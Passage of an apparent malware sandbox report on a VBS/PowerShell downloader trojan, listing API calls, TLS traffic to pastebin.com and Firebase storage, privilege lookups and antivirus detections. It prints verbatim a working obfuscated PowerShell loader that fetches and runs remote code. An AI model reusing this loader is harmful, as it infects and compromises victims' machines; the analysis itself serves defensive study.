c★UgBv★GQ★YQ★n★Cc★I★★g★Ck★I★★p★C★★Ow★n★C★★Ow★k★FY★QgBX★Fc★eg★g★D0★I★★o★C★★WwBT★Hk★cwB0★GU★bQ★u★Ek★Tw★u★F★★YQB0★Gg★XQ★6★Do★RwBl★HQ★V★Bl★G0★c★BQ★GE★d★Bo★Cg★KQ★g★Cs★I★★n★GQ★b★Bs★D★★Mw★u★H★★cw★x★Cc★I★★p★C★★Ow★k★E0★TwBE★FI★Zw★g★Hw★I★BP★HU★d★★t★EY★aQBs★GU★I★★t★EY★aQBs★GU★U★Bh★HQ★a★★g★CQ★VgBC★Fc★VwB6★C★★I★★t★GY★bwBy★GM★ZQ★g★Ds★c★Bv★Hc★ZQBy★HM★a★Bl★Gw★b★★g★C0★RQB4★GU★YwB1★HQ★aQBv★G4★U★Bv★Gw★aQBj★Hk★I★BC★Hk★c★Bh★HM★cw★g★C0★RgBp★Gw★ZQ★g★CQ★VgBC★Fc★VwB6★C★★Ow★=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\test22\AppData\Local\Temp\sostener2.vbs');powershell $Yolopolhggobek;
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: powershell.exe
parameters: $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwBw★GE★cwB0★GU★YgBp★G4★LgBj★G8★bQ★v★HI★YQB3★C8★c★B6★Fg★RwBr★GE★eQBV★Cc★I★★7★CQ★SQBl★H★★RwBR★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★x★C4★d★B4★HQ★Jw★p★Ds★J★B3★GU★YgBD★Gw★aQBl★G4★d★★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★FI★VgBV★Fg★dg★g★D0★I★★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★Ho★RgBL★GE★QQ★g★Ck★I★★7★CQ★UgBW★FU★W★B2★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BJ★GU★c★BH★FE★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★Cc★VQBU★EY★O★★n★C★★LQBm★G8★cgBj★GU★I★★7★CQ★UwBU★GY★RwBs★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★y★C4★d★B4★HQ★Jw★p★C★★Ow★k★F★★a★By★Gw★Tg★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★F★★a★By★Gw★Tg★u★EU★bgBj★G8★Z★Bp★G4★Zw★g★D0★I★Bb★FM★eQBz★HQ★ZQBt★C4★V★Bl★Hg★d★★u★EU★bgBj★G8★Z★Bp★G4★ZwBd★Do★OgBV★FQ★Rg★4★C★★Ow★k★EQ★S★B6★FU★QQ★g★C★★PQ★g★Cg★I★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★PQ★g★CQ★U★Bo★HI★b★BO★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★EQ★S★B6★FU★QQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BT★FQ★ZgBH★Gw★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BN★E8★R★BS★Gc★I★★9★C★★I★★n★CQ★cgB5★GE★ZQBH★C★★PQ★g★Cg★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★Jw★n★Cc★I★★r★C★★J★BT★FQ★ZgBH★Gw★I★★r★C★★Jw★n★Cc★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★FU★V★BG★Dg★KQ★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★EI★eQB0★GU★WwBd★F0★I★★k★EY★eQBm★GQ★eg★g★D0★I★Bb★HM★eQBz★HQ★ZQBt★C4★QwBv★G4★dgBl★HI★d★Bd★Do★OgBG★HI★bwBt★EI★YQBz★GU★Ng★0★FM★d★By★Gk★bgBn★Cg★I★★k★HI★eQBh★GU★Rw★u★HI★ZQBw★Gw★YQBj★GU★K★★n★Cc★J★★k★CQ★J★★n★Cc★L★★n★Cc★QQ★n★Cc★KQ★g★Ck★I★★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★FM★eQBz★HQ★ZQBt★C4★QQBw★H★★R★Bv★G0★YQBp★G4★XQ★6★Cc★I★★r★C★★Jw★6★EM★dQBy★HI★ZQBu★HQ★R★Bv★G0★YQBp★G4★LgBM★G8★YQBk★Cg★I★★k★EY★eQBm★GQ★eg★g★Ck★Lg★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★RwBl★HQ★V★B5★H★★ZQ★o★C★★Jw★n★E0★aQBz★GU★cgBp★GM★bwBy★GQ★aQBv★HM★bwBB★G0★ZQBu★C4★QwBs★GE★cwBz★DE★Jw★n★C★★KQ★u★Ec★ZQB0★E0★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★GU★d★Bo★G8★Z★★o★C★★Jw★n★E0★cwBx★EI★SQBi★Fk★Jw★n★C★★KQ★u★Ek★bgB2★G8★awBl★Cg★I★★k★G4★dQBs★Gw★I★★s★C★★WwBv★GI★agBl★GM★d★Bb★F0★XQ★g★Cg★I★★n★Cc★d★B4★HQ★Lg★1★DI★M★★y★GY★ZgBl★HQ★cwBv★HM★LwBz★GQ★YQBv★Gw★bgB3★G8★Z★★v★GU★ZwBy★G8★ZQBn★C8★N★★x★DU★MgBl★Gc★cgBv★Go★LwBn★HI★bw★u★HQ★ZQBr★GM★dQBi★HQ★aQBi★C8★Lw★6★HM★c★B0★HQ★a★★n★Cc★I★★s★C★★Jw★n★CU★SgBr★FE★YQBz★EQ★ZgBn★HI★V★Bn★CU★Jw★n★C★★L★★g★Cc★JwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★LQ★t★C0★LQ★t★C0★LQ★n★Cc★L★★g★Cc★Jw★w★Cc★Jw★s★C★★Jw★n★DE★Jw★n★Cw★I★★n★Cc★UgBv★GQ★YQ★n★Cc★I★★g★Ck★I★★p★C★★Ow★n★C★★Ow★k★FY★QgBX★Fc★eg★g★D0★I★★o★C★★WwBT★Hk★cwB0★GU★bQ★u★Ek★Tw★u★F★★YQB0★Gg★XQ★6★Do★RwBl★HQ★V★Bl★G0★c★BQ★GE★d★Bo★Cg★KQ★g★Cs★I★★n★GQ★b★Bs★D★★Mw★u★H★★cw★x★Cc★I★★p★C★★Ow★k★E0★TwBE★FI★Zw★g★Hw★I★BP★HU★d★★t★EY★aQBs★GU★I★★t★EY★aQBs★GU★U★Bh★HQ★a★★g★CQ★VgBC★Fc★VwB6★C★★I★★t★GY★bwBy★GM★ZQ★g★Ds★c★Bv★Hc★ZQBy★HM★a★Bl★Gw★b★★g★C0★RQB4★GU★YwB1★HQ★aQBv★G4★U★Bv★Gw★aQBj★Hk★I★BC★Hk★c★Bh★HM★cw★g★C0★RgBp★Gw★ZQ★g★CQ★VgBC★Fc★VwB6★C★★Ow★=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\test22\AppData\Local\Temp\sostener2.vbs');powershell $Yolopolhggobek;
filepath: powershell.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received [
Data received Wg÷% šDŠ44¼p(ò™†&ÃM,DOWNGRD §&3óŸ›b9èê„Dƒ¿Æxâ6s*Yõ-:ôÀÿ 
Data received ¼
Data received ¸µ70‚30‚ †’?P(¤ úÆvE40  *†H†÷  0;1 0 UUS10U Google Trust Services1 0 UWR10 250328151841Z 250626161555Z010U pastebin.com0‚"0  *†H†÷ ‚0‚ ‚ÂW‰ŸëÖ+X›˜6€â²®Ô‰3ì4Ÿ5¦*ž|òï·åìóÙR¶øGPŒ3|jC“ìiF´\¸³Žl䣟Wݖ²éW7®R"e°ß°Ôjù¾ŸD§Â,ÁÇÜu-íV¦s!ÚC¢H=ØѼè¿IAÂÚû7ÿ¹AcY‘4aêpõ›Í•’·Œ‡3·¦à¨`˜G£[kÒ …â8~Š:Ô³k¦._ºO”ÇûGc¼›d‹QÂHd€¾ õ¾ ñã7'ù|Çß^ó­ ±¶<æŠêfµË×&JT{t`z<›­1°Ü£.`ðωâm¢‘ö¨‚°¥/8Ç£‚T0‚P0Uÿ 0U% 0 +0 Uÿ00UjÈJ €Þ¾sd»‘ZÉ| >@T0U#0€fiIÔÞ*œ‘ω$¸0nˆ.0^+R0P0'+0†http://o.pki.goog/s/wr1/ho80%+0†http://i.pki.goog/wr1.crt0'U 0‚ pastebin.com‚*.pastebin.com0U  0 0g 06U/0-0+ ) '†%http://c.pki.goog/wr1/tyyTOlCKhGQ.crl0‚ +ÖyôñïuNu£'\šÃ8[lÔß?RëðàŽiÀ±úd±bš9ß•ÝŒlcF0D f܇ÿç\¯­Ô1€µ¿€Ùë5K¾K”êÑD->©Ô® õ¾™ó¥¨&Æàë¶CSã-î›Ù´ºVI@c›-ʛ{vÌûj…q eþ•›SÎé²|"é…\ —¶©~TÀþL °•ÝŒl¯G0E!/ø+Ÿveqí¤$èYSê‘pÃg;ïф<é.Y™ f¦; |~)L ¢ª²¨¢½›’ÙÅUïŽm`‘_ݕyï0  *†H†÷  ‚¾a­ÆT\ëÔ£t#øã,cSçî!â§ùÜøÖ/"œÙܙȡÌ(·Üªgn z&Ê,S:†zûÒ5e};ïìåîý^»ºm8É­%ÿfœDËN0@5‡Ã×ÚhZÀÚ$E-ú±#$³æHWÞC] ¸ÖO¾Ž¥™œÛË "TY9N×:Š"M$<z#®È¥²AŠÜmþ—:w!;­e~©~P©Xc!X#ä_‰<Ô PHÔ.&ÿ5Îw«Žš—q¹¨îGÄWL4f@>ÑAoBÞ8ƒ¶þ µ5I/jûþÑÝãõÈÝw¹¬Ù׿CÌtÃ2Q>ؓ~0‚ 0‚ó ÙâÂÒŠt¶'¢mh§0  *†H†÷  0G1 0 UUS1"0 U Google Trust Services LLC10U GTS Root R10 231213090000Z 290220140000Z0;1 0 UUS10U Google Trust Services1 0 UWR10‚"0  *†H†÷ ‚0‚ ‚Ïn6Š·+îF˜Spwî£K r¾#-ÂGƏ\ù=æŽî3" ÉH¸°bÎôi r}ÞÕ&Ãn›Ï~× ÏƐ;£‚Ú:ÿlV¿Üéa”Eäi¼OÉÀ­aDr Ð+žhjbjŠ"Wyi+â$3~vc,]¼Qi~#±ÿvñî¸Xµk5ï¡æH(9—1Ù•§ž®Ï˜¼žŠᰗMPo“LJøÛ}ñ™ã–íî1êr=Rß%d¥ pªžè¨¹GȧZ%`oBá×?ç ðƒF3 æKwv¡h§]ïØ(w5­­FäbnâªøÌï7~&³£þ0û0Uÿ†0U%0++0Uÿ0ÿ0UfiIÔÞ*œ‘ω$¸0nˆ.0U#0€ä¯+&q+H'…/Rf,ïð‰q>04+(0&0$+0†http://i.pki.goog/r1.crt0+U$0"0   †http://c.pki.goog/r/r1.crl0U  0 0g 0  *†H†÷  ‚Næ³ ‘`'ùQMî¸Á‰Õ"„—æÖßæN:;)~Þ ñ⍋ӪD7’˜¥ý7Œ©IX1d&eµC×ò—ìT9›U:8wá³@'ÏV{Tœ37yðäîÌQ²‘s!Ã?©¶Ó¤×—Òák$ÛäïèT•• ßý.¶n»ƒZ4Pà†{™ŠŠˆJ¤ÓÇi9Ÿ“˜ðÊAË_È]·«o )Õ$§Ÿo‘#»z7÷ê<*ðÀXéòH5§­DÆ£Ø †Œ“=¤÷°%¾ˆ÷ÿß¾§^€³ØøïÅG%˜Š,>·4ɕjµPuÒ êC¯MîdҙñFt~šwF„ï´ËmÆEz6¹èü§•*¦z¾{ñγê£PU˜ü–P¯¯êÁ®ÎÎÌ«´klã½tpÌ¤úu¢üLVÝ{Ò±.Mø.‘ ¥f« ólqюÍx ½ó…Ã;ħB¸31åñ“–%'U”P¾? 7ý‰_ô ¢¥kõÏo,æÄulü¿ºä7¾9Ù玑F#Üq¶ÃrF̚Ñ@œûºS¨\5ä žñ!³—hq·^–ÛÇü@nŠ²k;1DÚ»@/,—TÝ3Ÿ ¥Î%õ*AåHçè@í_§×à?Ÿ³iƒD¾äàòµhy]nxqÃuv²g0®x¶Ú3‡Gf0‚b0‚J w½ lÛ6ùê!ÄðXÓ 0  *†H†÷  0W1 0 UBE10U GlobalSign nv-sa10U Root CA10UGlobalSign Root CA0 200619000042Z 280128000042Z0G1 0 UUS1"0 U Google Trust Services LLC10U GTS Root R10‚"0  *†H†÷ ‚0‚ ‚¶‹ã¡w›;Ü¿”>·•§@<¡ý‚ù}2‚qööŒûèÛ¼j.——£ŒKù+ö±ù΄±ùŗÞï¹ò£é¼‰^§ªR«ø#'ˤ±œcÛי~ð ^ëh¦ôÆZG M3ãN±£ÈlKìü ßd)%#¡´Ò=.`àÏÒ ‡»ÍHðMÂÂzˆŠ»ºÏYÖ¯°°ž1ñ‚ÁÀß.¦mlµØ~&E=°y¤”(­&å¨þ–è<h”Sîƒ:ˆ+– ²àzŒ.u֜ë§Vd–Oh®=—„À¼@À \½ö‡³5l¬P„àLÍ’Ó é3¼R™¯2µ)³%*´HùráÊd÷悍èÂŠˆú8fŠücùùxý{\wúv‡úìß±y•W´½&ïÖÑë »Ž µÅŊU«Ó¬ê‘K)̤2%N*ñeDÐΪÎI´êŸ|ƒ°@{çC«§l£}‰úL¥ÿՎÃÎKàµØ³ŽEÏvÀí@+ýS°§Õ; ±Š¢Þ1­Ìwêo{>Öߑ"æ¾úØ2ücQrÞ]Ö“½)h3ï:fìŠ&ß×Wex'Þ^I¢š¨!¶©±•°¥¹ ÚÇlH<@à~ ZÍV<ї¹ËKí9KœÄ?ÒUn$°ÖqúôÁºÌíõþAؘ=:È®z˜7•£‚80‚40Uÿ†0Uÿ0ÿ0Uä¯+&q+H'…/Rf,ïð‰q>0U#0€`{fE —ʉP/}Í4¨ÿüýK0`+T0R0%+0†http://ocsp.pki.goog/gsr10)+0†http://pki.goog/gsr1/gsr1.crt02U+0)0' % #†!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g 0g 0  +Öy0  +Öy0  *†H†÷  ‚4¤±(£Ð´v¦1z!éÑR>ÈÛtAˆ¸=5íäÿ“á\_«»ê|ÏÛä ыWò&o[¾Fh”7okzÈÀ7ú%Q¬ìh¿²ÈIýZšÊ#¬„€+Œ™—ëIjŒu×Ç޲ɗŸXHW5¡äÖýoƒoïŒÏ—¯À…*ðõNi ‘-áh¸Á+séÔÙü"À7 fIíUgá2×Ó&¿pã=ôgm=|å4ˆã2ú§njo½‹‘îKè;©³7çÃD¤~Øl×ÇFõ’›çÕ!¾f’”UlÔ)² Áf[âwIH(í×3rS³‚5Ïb‹É$‹¥·9 »~*A¿RÏü¢–¶Â‚?
Data received K
Data received GA!®ÐíSz ÕN)(1³Ý¤ÿ²*C¿©ÏŒã‚{‰_ r:Qü†nå.r«pö»y˜a¥$½…j¾âQȹ8¦ 6z\ùº”KÄãc¸fÌ%ª Î1¬7Û_ì(¢wå{^Ÿ×ÊΟxyÛæ@YW¾âÁ)).ã®ËË­õoW‹u§9£0j(­7½î`%IÓš'‹·à÷ëSîiÕ µ%µ+‚gëÍ%ìFúɝâ:»B>=k׆½;:|´ŠïR­™àj¨i¾oì:‘^±#0ö5ßkb½^¬±b–:²Åº:>ºµ]iè{nðÊÜÒ`¨®Æ]Ö½1ÐîÇÀ®ªÓ!TxwŒÌ0°‚!Ém³죓…E„óeøæ ދÎœ{åé‡*ºÑÖÄVѐ½Ò°+®¾||°ú
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received ˆxcEq§LùØHí+˜“pÐ.Z' ‡tûlðƒ¾àÑéPd¢VŽ.ç—Å¥
Data received @
Data received / ú ҝ|ƒí§8›™©ž1šÇÖ׀™ªU._œÏ¼ª (›>=çn¶Œ²©b-^’]øÞ;¤Sõý\ÛLÈô‘¾­ž°u-" Ùd6˜„uxgÿžuä‹ö¦2>8 Pþªæá³cÏZ]Aƒ|Ò( ؾžV?°K¾£'O)à$T=…ÛïãÕÐ5§¥óÌàÉ*¦¦ÅŠ¹3֌ÒؾM ú×àªë ߑn™º_ò`«¬¶3º·Ã+øâº,Xr½ ,¦NzÉPnô A؄ICÙVL‘¡Ùm.eO  CÂbB¯Ôë«I€%ùâ9Üm¸Æ‰Au gî"´•¥¤’ül÷kêˆrŗ¢îú“žO§Ý¦¡¡JQU¼d^¶?ùg1__fÆz¤öeïRläð¸Xqùê6,YÝ0uI²µ>sˆþ(t8Ѧ=Š®Ko¤?ÕòÇÆ“wDè@™”p(/i¤bü–³L/Ŭ¶&º!”©¡”.m“h€Ü_3ÚnOÆP­F‰ՌæB÷×Å:ó+êœtج—÷AO ™öbȔgE™ÙÅá7ˆd+§XI”GêY)Û az'Z› ‹Ùî¡1¾Š+F {ˆH‚ {˜¢!þ06B³"É)!<Òq},ÊügqZn ˜QÍÄ.;¥°H÷WY*âG£Ÿ~šÇ\óì/…63…+íp°®Í)ώÂã4Á«2i^¾@†™1!zìÄÛ qšú
Data received 
Data received @ÁÄÍâ7»M`î{Vù4óªpí1âpaZXå–g)~
Data received W
Data received Sg÷% ¤ƒkt Íïjҟ8áN¤¼û¬;DOWNGRD ¤Ë~IÅyѓ÷ÊÖ²õ(æj`FG!öxIÌKûÀ ÿ 
Data received  S
Data received O L#0‚0‚Å q¯<ùN]×½ YëL?†0 *†HÎ=0;1 0 UUS10U Google Trust Services1 0 UWE20 250320111954Z 250612111953Z0"1 0Uupload.video.google.com0Y0*†HÎ=*†HÎ=BNNߥM®¥%“‚ öã]`"p¼Ÿ ˆNã¡?+º:†Ò¬aäiÌóD€-Dž9O tä“ç$%+¯ô´,X£‚Â0‚¾0Uÿ€0U% 0 +0 Uÿ00Uö˜†Ïìç¼Ô´Ïƾ]0Â4¤!0U#0€u¾Äw®‰öD7}ϱhëÜ4Y0X+L0J0!+0†http://o.pki.goog/we20%+0†http://i.pki.goog/we2.crt0‚˜U‚0‚‹‚upload.video.google.com‚*.clients.google.com‚*.docs.google.com‚*.drive.google.com‚*.gdata.youtube.com‚*.googleapis.com‚*.photos.google.com‚*.youtube-3rd-party.com‚upload.google.com‚*.upload.google.com‚upload.youtube.com‚*.upload.youtube.com‚uploads.stage.gdata.youtube.com‚bg-call-donation.goog‚bg-call-donation-alpha.goog‚bg-call-donation-canary.goog‚bg-call-donation-dev.goog0U  0 0g 06U/0-0+ ) '†%http://c.pki.goog/we2/yK5nPhtHKQs.crl0‚ +ÖyõòðvÏVîÕ.|¯ó‡[Ùi.›éqgJ°ì¬Ò[wÎÌ;•³~òG0E tÐú˜VȒ¸áÁ¤WŠƒøTÜ<50Cß/?ÍBHVJB!°•å¡JР$*1ò'øì<xgQ)ÒÃìå¿gÆvà’³ü Èçh6Þa¹–M RxŠrÖrÄ°M¥moT•³~òAG0E )ØÖÂ(”[¥·Ø]­°Wºfüvû¼<Å­.Ǝ&Е¼¹!‹‡N™%€³6‰fî ÷Z–3Äm'Bdª°¿<0 *†HÎ=H0E!ßÐ.åómOfyƒ’ƒ¡ªP? oú—TªžÏN \Îß{¬¢ZÄÿݟÀè®Ój阕$æ¯Ù?ãQb¢0‚ž0‚% ó-k@Ֆ[‡:|rà0 *†HÎ=0G1 0 UUS1"0 U Google Trust Services LLC10U GTS Root R40 231213090000Z 290220140000Z0;1 0 UUS10U Google Trust Services1 0 UWE20Y0*†HÎ=*†HÎ=B5~òí}áž*4C†ÁՖè'pߞ˩ʆy MFŠÂt¤»Ù¿îý#×8óKïTá¾çÊU%¨ 0¬-]N¡Q£þ0û0Uÿ†0U%0++0Uÿ0ÿ0Uu¾Äw®‰öD7}ϱhëÜ4Y0U#0€€LÖëtÿI6£ÕØüµ>Åjð”Œ04+(0&0$+0†http://i.pki.goog/r4.crt0+U$0"0   †http://c.pki.goog/r/r4.crl0U  0 0g 0 *†HÎ=g0d0 ½¸6UÈ5£ÒÙ}9sÓ÷÷‚¸ сoådEÛÞªÀE¬“è`ì.~D,"”‘ì¬0/ß vL-iaÕOý˜˜„Û4ê˜ì›ÍˆbÿÒeå3jš í#I8/Q¿‘ТÉ88Ú~0‚z0‚b å0¿3C¾Ý‚I=Š0  *†H†÷  0W1 0 UBE10U GlobalSign nv-sa10U Root CA10UGlobalSign Root CA0 231115034321Z 280128000042Z0G1 0 UUS1"0 U Google Trust Services LLC10U GTS Root R40v0*†HÎ=+"bóts§h‹`®C¸5Ł0{KIûÁaÎæÞF½kÕa5®@Ýs÷‰‘0Zë<î…|¢@v;©Æ¸GØ*璑jsé±r9Ÿ)Ÿ¢˜Ó_^X†e¡„eÑ܋ÉÇsȌj/åÄ«ÑŠ£ÿ0ü0Uÿ†0U%0++0Uÿ0ÿ0U€LÖëtÿI6£ÕØüµ>Åjð”Œ0U#0€`{fE —ʉP/}Í4¨ÿüýK06+*0(0&+0†http://i.pki.goog/gsr1.crt0-U&0$0"   †http://c.pki.goog/r/gsr1.crl0U  0 0g 0  *†H†÷  ‚B»Ö‡–ã?c ¤¡hH 9"sžøËN-1éŸç ¡Ò6„¬yëé°ëj¶{ }t¸›e«h*,,ÝBýÆq χ-÷kÈn}Vâ#XXù%º…G×– ý ¶Œà.®UÑyu5,1[?e¼Íœ‡B§‘±›^Žñ»Ê-Gð¬c~†¿ÖäkÓÖÓŽŠgX¸ÿ÷¦„ IP[?: % ò‹\ÓyW6‚Îÿ&·©ñ™í­‚>ÈnëÓ<8ÀAšá^SÏ> Wëîâ?H¥ñ¾Ñj# û?/¢µ½ên£FÎ.g¯3&˜ªÕKÒ©6Å&;[‹ˆÁå
Data received ‘
Data received ALý·ð®ŸLäEë³±4—NG@g’[ƜTñ78˜´)ÜŠ‚?î2o…?NKí‡]áž×=ÃåÁb#F0D =O¨|[.%rY䶤}#ÄZ¯±ôR‚×% R†>i ýfóXދL«W–ó[u©Ý×-­ÌtœÔHÏBu
Data received +¿ª}²A2É$}^aÃÕYw[©­MóŤԬö¥ ˜™òb\«•©øØñiè¨
Data received p
Data received '÷nKT Ö^ë•ÌV'N™-t×b bÓªee>†eYû÷ä$᚟œQ²{Á –øÊ\^§×;M¦ø5*lÖ¶IU¥ÚÓedä?’LK0áJ”_ 8)\‡¢×ÏÅPˆGMËP³n×}CÖÏ¡y×3|PÕo r« 2Q¼F˜ jþ‘Y-·.¯aÒ+Å¤P/ñUe%Cdz¡ÏÕ)݇ÔÉòC²0“†sßZ§b(÷;+Ç3¸êɯ`€Ë×¹XæRJû—ÁÀÐŽåı_5$âE··öˆPТ¨:± ·=Þüì,¦€±±Ù ø6aX˙ê4ȏ‡9gd@óX×l6˜à'RnºÄúÊG"~;×ÂKƒv)I]yÛûE‘ÎxüÝ$ ”˜1eÕ[èv_;^³È·kݘuÙç¹Ù®Í8Œæµ Øåí¡ìâûí(“îE÷7xRýãq½ÛfìŠ5qúb<ÿôàÝéÐò.¥Ã–†ñ„®œA¬´ßŸ…„lQ‚Û›²Ž™Î‘DïÙHûÍÇ&ç C:Hâ-LòÛM•ÍOñΞl™›¥ï(Pìöœ3³Q^Þá:©ùÊòtÿU’zV )+“ü]‚¸MÎOB(rÔÿ!z³!ŗû½þ{ñ¼l ’:~«y¢ˆB fðÐþg‚ÆØñª€7~H–/úk~®Š-ò,¬zÊ¡‹ß=“|¬¶·?m’<m‹·¼zÂøøÔßÉ5Fõ¤¼üXìÅW«´YƒS¦uÉÓ|p¡æÜCØŸ“s
Data sent okg÷$‹”‡¬[NöM¾s˜×!lŽ*JÆl¿V„”I/5 ÀÀÀ À 28*ÿ pastebin.com  
Data sent FBAÝÒ6YWÕÆtéZbìˌ‰ƒó ^\6Ù ùÔRý 9Â1ÊÛÝ £}£¯6i7²zí“ût,(A|o霆" iî0”Ȩ«ù0Æ?¹½øÍÚðQé0VʹêõV·ÔÝšÓ `j­ƒÁõT‹à ô˜
Data sent `¹›ÂmµÚqë!í£^??U%Îq·Q…)ŒV³Ï#wô„Mß0ÁÊöSh, *DëÔ󶢑â¯Ó}®Šœø3b†gî¹&’õAʳ>Yæ^*YÕ>ÚêYÑI1x‹
Data sent }g÷$Œ´YÉ øÆsÍ@uÛ&ïŸÜa€Ë>û=‚À/5 ÀÀÀ À 28<ÿ#!firebasestorage.googleapis.com  
Data sent FBAqD¾ ò¥ñg2¤2‡Z×+þiç=zÊNÀøСz«©:<§$PÈ!Úâî¬CRçPìR,®Ð$ú50H&·›£ï½iD_ﶋ¹!®%us4mª³Þ…ç¸@°6 ¶܃eçTª “¡žÒê
Data sent ÐU½&°xª›>Û鈚·„•»« ƒbË ™gÉIÒkY³FÁtøN;)®o’)° u‚;9=¹Ûw÷KI¶T$Éށ… gw‰°]Ÿú­G‚)ùãðm4ÖÀdÔ¿,'Ø(žÔmžûò¢Ú3b9ʹ9]¡qÿvjZÆTP:¥AWû§ó_Gs*ôd)\hŸx¡"ÈjG{à›ú¡!¼€òâg·ÿºrZ“”Ží—Á©VøP" ökp¶´@ìô
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
K7GW NetWorm ( 0053c52c1 )
K7AntiVirus NetWorm ( 0053c52c1 )
Symantec VBS.Downloader.Trojan
Avast Script:SNH-gen [Drp]
Kaspersky HEUR:Trojan.Script.Generic
NANO-Antivirus Trojan.Script.Vbs-heuristic.druvzi
Google Detected
Varist VBS/Agent.CAA
huorong Trojan/VBS.Runner.v
Fortinet VBS/Agent.ABGD!tr.dldr
AVG Script:SNH-gen [Drp]
Time & API Arguments Status Return Repeated

send

 buffer: okg÷$‹”‡¬[NöM¾s˜×!lŽ*JÆl¿V„”I/5 ÀÀÀ À 28*ÿ pastebin.com  
socket: 1456
sent: 116
1 116 0

send

 buffer: FBAÝÒ6YWÕÆtéZbìˌ‰ƒó ^\6Ù ùÔRý 9Â1ÊÛÝ £}£¯6i7²zí“ût,(A|o霆" iî0”Ȩ«ù0Æ?¹½øÍÚðQé0VʹêõV·ÔÝšÓ `j­ƒÁõT‹à ô˜
socket: 1456
sent: 134
1 134 0

send

 buffer: `¹›ÂmµÚqë!í£^??U%Îq·Q…)ŒV³Ï#wô„Mß0ÁÊöSh, *DëÔ󶢑â¯Ó}®Šœø3b†gî¹&’õAʳ>Yæ^*YÕ>ÚêYÑI1x‹
socket: 1456
sent: 101
1 101 0

send

 buffer: }g÷$Œ´YÉ øÆsÍ@uÛ&ïŸÜa€Ë>û=‚À/5 ÀÀÀ À 28<ÿ#!firebasestorage.googleapis.com  
socket: 1968
sent: 134
1 134 0

send

 buffer: FBAqD¾ ò¥ñg2¤2‡Z×+þiç=zÊNÀøСz«©:<§$PÈ!Úâî¬CRçPìR,®Ð$ú50H&·›£ï½iD_ﶋ¹!®%us4mª³Þ…ç¸@°6 ¶܃eçTª “¡žÒê
socket: 1968
sent: 134
1 134 0

send

 buffer: ÐU½&°xª›>Û鈚·„•»« ƒbË ™gÉIÒkY³FÁtøN;)®o’)° u‚;9=¹Ûw÷KI¶T$Éށ… gw‰°]Ÿú­G‚)ùãðm4ÖÀdÔ¿,'Ø(žÔmžûò¢Ú3b9ʹ9]¡qÿvjZÆTP:¥AWû§ó_Gs*ôd)\hŸx¡"ÈjG{à›ú¡!¼€òâg·ÿºrZ“”Ží—Á©VøP" ökp¶´@ìô
socket: 1968
sent: 213
1 213 0
